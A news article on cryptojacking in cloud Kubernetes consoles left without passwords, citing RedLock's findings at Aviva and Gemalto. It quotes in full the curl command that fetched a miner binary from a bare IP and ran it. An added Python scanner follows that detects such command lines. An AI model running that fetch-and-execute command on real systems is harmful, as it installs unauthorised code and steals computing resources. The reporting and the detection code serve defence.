Crypto-coin miners caught toiling away in hacked cloud boxes

Manic miners don't even pwn you: They just use default creds admins are too lazy to change

By Richard Chirgwin

Here's yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.

Security outfit RedLock's security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It's believed hackers are able to get into boxes by using their default credentials.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.

It's one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 terawatt-hours, and it takes 215 kWh for a single transaction.

However, you'd be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such as Coin Hive's, spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.

In Aviva's case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone had automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory is supported by this Reddit post.

In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva's server, with the same email recipient:

curl -L http://208.115.205.133:8220/minerd -o minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u didi123123321@gmail.com -p x
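As an added defender's example (not part of the article or RedLock's report), here is a small Python scanner that flags process command lines carrying the signals visible in that command: a stratum pool endpoint with its algorithm and worker switches, or a binary fetched from a bare IP with curl/wget. The process listing, PIDs and worker name are constructed sample data; the pool host is the one quoted above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Signals taken from the quoted command: a stratum pool URL, the
# cryptonight switch (Monero), and a download from a bare IP address.
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://([\w.\-]+):(\d+)")
ALGO_RE = re.compile(r"(?:^|\s)-a\s+(\S+)")
WORKER_RE = re.compile(r"(?:^|\s)-u\s+(\S+)")
DROP_RE = re.compile(r"\b(?:curl|wget)\b[^;&|]*https?://(\d{1,3}(?:\.\d{1,3}){3})")

@dataclass
class Finding:
    pid: int
    reason: str            # "stratum-pool" or "ip-download"
    detail: str            # pool host:port, or the download source IP
    algo: Optional[str] = None
    worker: Optional[str] = None

def classify(pid: int, cmdline: str) -> Optional[Finding]:
    """Classify one process command line; None when nothing looks miner-like."""
    pool = STRATUM_RE.search(cmdline)
    if pool:
        algo = ALGO_RE.search(cmdline)
        worker = WORKER_RE.search(cmdline)
        return Finding(pid, "stratum-pool", f"{pool.group(1)}:{pool.group(2)}",
                       algo.group(1) if algo else None,
                       worker.group(1) if worker else None)
    drop = DROP_RE.search(cmdline)
    if drop:
        return Finding(pid, "ip-download", drop.group(1))
    return None

def scan(ps_lines: List[str]) -> List[Finding]:
    """Walk 'PID ARGS' lines (as produced by `ps -eo pid,args --no-headers`)."""
    findings = []
    for line in ps_lines:
        pid, _, cmd = line.strip().partition(" ")
        if pid.isdigit():
            hit = classify(int(pid), cmd)
            if hit:
                findings.append(hit)
    return findings

# Constructed sample listing: the miner line mirrors the article's command,
# with the e-mail recipient swapped for a placeholder worker name.
SAMPLE_PS = [
    "4242 mysqld --datadir=/var/lib/mysql",
    "4310 ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u WORKER_PLACEHOLDER -p x",
    "4400 sh -c curl -L http://192.0.2.10:8220/minerd -o minerd;chmod 777 minerd",
]
```

Running `scan(SAMPLE_PS)` reports the minerd process with its pool, algorithm and worker, plus the curl download from a bare IP, while the MySQL daemon itself is left alone.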

Change those credentials, people. ®
